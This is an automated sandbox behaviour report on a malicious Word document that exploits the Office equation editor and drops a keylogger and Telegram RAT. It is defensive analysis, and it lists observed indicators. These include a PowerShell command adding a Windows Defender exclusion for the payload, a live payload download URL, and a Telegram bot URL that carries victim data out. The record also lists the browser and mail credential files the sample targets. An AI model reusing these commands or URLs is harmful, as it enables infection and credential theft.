Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 2B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 2640000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 570000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 5EA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 6EA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 6FF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 7FF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 8950000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 9950000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 2B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 2640000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 350000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 600000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3068 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3976 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Window / User API: threadDelayed 9697 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3324 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3484 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3532 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652 Thread sleep count: 3068 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660 Thread sleep count: 3976 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3700 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3764 Thread sleep time: -13835058055282155s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3764 Thread sleep time: -3000000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3768 Thread sleep count: 120 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe TID: 3768 Thread sleep count: 9697 > 30 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3804 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Thread delayed: delay time: 600000 Jump to behavior
Source: cmnjgwhesilo61000.exe, 00000005.00000002.406677498.0000000000454000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hgFstpgF.WxgF.W
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory written: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Queries volume information: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Queries volume information: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe VolumeInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1545181 Sample: na.doc Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 41 Initial sample is an obfuscated RTF file 2->41 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 23 other signatures 2->47 8 WINWORD.EXE 291 18 2->8         started        process3 file4 27 C:\Users\user\Desktop\~$na.doc, data 8->27 dropped 11 EQNEDT32.EXE 11 8->11         started        16 EQNEDT32.EXE 8->16         started        process5 dnsIp6 39 87.120.84.38, 49163, 80 SHARCOM-ASBG Bulgaria 11->39 29 C:\Users\user\...\cmnjgwhesilo61000.exe, PE32 11->29 dropped 31 C:\Users\user\...\pKL9HXcZosWfPt1[1].exe, PE32 11->31 dropped 65 Office equation editor establishes network connection 11->65 67 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->67 18 cmnjgwhesilo61000.exe 3 11->18         started        file7 signatures8 process9 signatures10 49 Machine Learning detection for dropped file 18->49 51 Adds a directory exclusion to Windows Defender 18->51 53 Injects a PE file into a foreign processes 18->53 21 cmnjgwhesilo61000.exe 12 2 18->21         started        25 powershell.exe 4 18->25         started        process11 dnsIp12 33 reallyfreegeoip.org 21->33 35 api.telegram.org 21->35 37 9 other IPs or domains 21->37 55 Installs new ROOT certificates 21->55 57 Tries to steal Mail credentials (via file / registry access) 21->57 59 Tries to harvest and steal browser information (history, passwords, etc) 21->59 signatures13 61 Tries to detect the country of the analysis system (by using the IP) 33->61 63 Uses the Telegram API (likely for C&C communication) 35->63
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 unknown United States
16989 UTMEMUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 unknown European Union
13335 CLOUDFLARENETUS false
87.120.84.38
 unknown Bulgaria
51189 SHARCOM-ASBG true
193.122.6.168
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
193.122.130.0
 unknown United States
31898 ORACLE-BMC-31898US false
158.101.44.242
 unknown United States
31898 ORACLE-BMC-31898US false
132.226.247.73
 unknown United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.6.168 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://87.120.84.38/txt/pKL9HXcZosWfPt1.exe true
    		unknown
    https://reallyfreegeoip.org/xml/173.254.250.78 false
      		unknown
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2010/31/2024%20/%204:16:24%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
        		unknown
        http://checkip.dyndns.org/ false
        • URL Reputation: safe
        		 unknown